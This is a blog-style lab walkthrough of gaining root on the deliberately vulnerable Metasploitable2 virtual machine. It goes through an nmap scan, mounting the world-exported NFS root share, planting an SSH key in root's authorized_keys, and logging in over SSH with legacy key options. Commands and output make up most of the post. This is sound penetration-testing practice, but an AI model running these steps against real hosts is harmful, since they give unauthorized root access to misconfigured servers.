Metasploiting NFS

Apr 3, 2023 · 5 min read · cyber security linux metasploitable  ·
Share on:

Following on from my "getting Metaploitable2 running on KVM/QEMU" post, I thought I had better get round to trying to exploit some of the vulerabilities on this intentially vulnerable virtual machine.

Easiest place to start (so I thought) would be the low hanging fruit of a poorly configured NFS server which exposes the entire file system of the target.

Before we walk through this, I will assume that we already know the address of the target machine. In order to save a little time, you can set the IP address of the target as a variable by doing the following:

1# TARGET="192.168.69.172"

Lets exploit

  1. Enumerate the target
 1# nmap -sV $TARGET
 2Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-02 21:14 BST
 3Nmap scan report for 192.168.69.172
 4Host is up (0.0052s latency).
 5Not shown: 977 closed tcp ports (reset)
 6PORT     STATE SERVICE     VERSION
 721/tcp   open  ftp         vsftpd 2.3.4
 822/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
 923/tcp   open  telnet      Linux telnetd
1025/tcp   open  smtp        Postfix smtpd
1153/tcp   open  domain      ISC BIND 9.4.2
1280/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
13111/tcp  open  rpcbind     2 (RPC #100000)
14139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
15445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
16512/tcp  open  exec?
17513/tcp  open  login
18514/tcp  open  tcpwrapped
191099/tcp open  java-rmi    GNU Classpath grmiregistry
201524/tcp open  bindshell   Metasploitable root shell
212049/tcp open  nfs         2-4 (RPC #100003)
222121/tcp open  ftp         ProFTPD 1.3.1
233306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
245432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
255900/tcp open  vnc         VNC (protocol 3.3)
266000/tcp open  X11         (access denied)
276667/tcp open  irc         UnrealIRCd
288009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
298180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
30MAC Address: 00:0C:29:FA:DD:2A (VMware)
31Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
32
33Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
34Nmap done: 1 IP address (1 host up) scanned in 71.96 seconds
  1. Note that NFS port (2049) is open as well as SSH (port 22)
  2. Check what mounts are available
1# showmount -e $TARGET
2Export list for 192.168.69.172:
3/ *

  1. Interesting - the filesystem root is available as an NFS share. This means that we can remotely mount the entire filesystem have have read/write access

  2. Next, mount the NFS share

1# mount -t nfs $TARGET:/ /mnt
  1. We can then create an ssh key pair on the attacking machine, in this case we can just press Enter when asked to create a passphrase
 1# ssh-keygen                       
 2Generating public/private rsa key pair.
 3Enter file in which to save the key (/root/.ssh/id_rsa): 
 4Enter passphrase (empty for no passphrase): 
 5Enter same passphrase again: 
 6Your identification has been saved in /root/.ssh/id_rsa
 7Your public key has been saved in /root/.ssh/id_rsa.pub
 8The key fingerprint is:
 9SHA256:BdSwHNhDnG5RQjnnyUz1V5WA08DqIc2MbNg89gRN6lU root@kali
10The key's randomart image is:
11+---[RSA 3072]----+
12|       B@BoE=.. =|
13|      .oX*=+ o ..|
14|      =oO@o.. . .|
15|     ..X+O=    . |
16|      ooS .      |
17|         o       |
18|                 |
19|                 |
20|                 |
21+----[SHA256]-----+
  1. We need to insert the newly created id_rsa.pub contents in to the authorized_keys file for the root user.
1# cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
  1. Now try to SSH in to the target machine
1# ssh -i ~/.ssh/id_rsa root@$TARGET

  1. In my case, I receive the following error:
    Unable to negotiate with 192.168.69.172 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

  2. In order to overcome this error, I needed to specify a few options that (in my experience) are not usually needed:

 1# ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa -i ~/.ssh/id_rsa root@$TARGET 
 2Last login: Sat Mar 25 19:49:16 2023 from :0.0
 3Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
 4
 5The programs included with the Ubuntu system are free software;
 6the exact distribution terms for each program are described in the
 7individual files in /usr/share/doc/*/copyright.
 8
 9Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
10applicable law.
11
12To access official Ubuntu documentation, please visit:
13http://help.ubuntu.com/
14You have new mail.
15root@metasploitable:~#
  1. We're now in as root and have "owned" the machine.

Conclusion

In theory this should have been a straight forward exploit: copy your key to the target using the NFS filesystem, and SSH in.

In this case I had been following a few guides on how to use the poorly configured NFS implementation, but I struggled with the error message that I was recieving. It seems that the configuration of this target had perhaps changed since those guides were written (even the guide on Rapid7's own website did not work for this); it did not accept the generated key from the ssh-keygen command having tried a few different options to generate the key, trying to own the 'msfadmin' user instead of the root user (had suspected some permissions issue) I had to do some digging around around eventually found an answer in a Stack Overflow thread. So if at first you do not succeed, do not lose heart, keep digging, keep trying different things.

If that does not work, then take a break - in my case here I took a few days break from it, sat down and cracked it on the first attempt.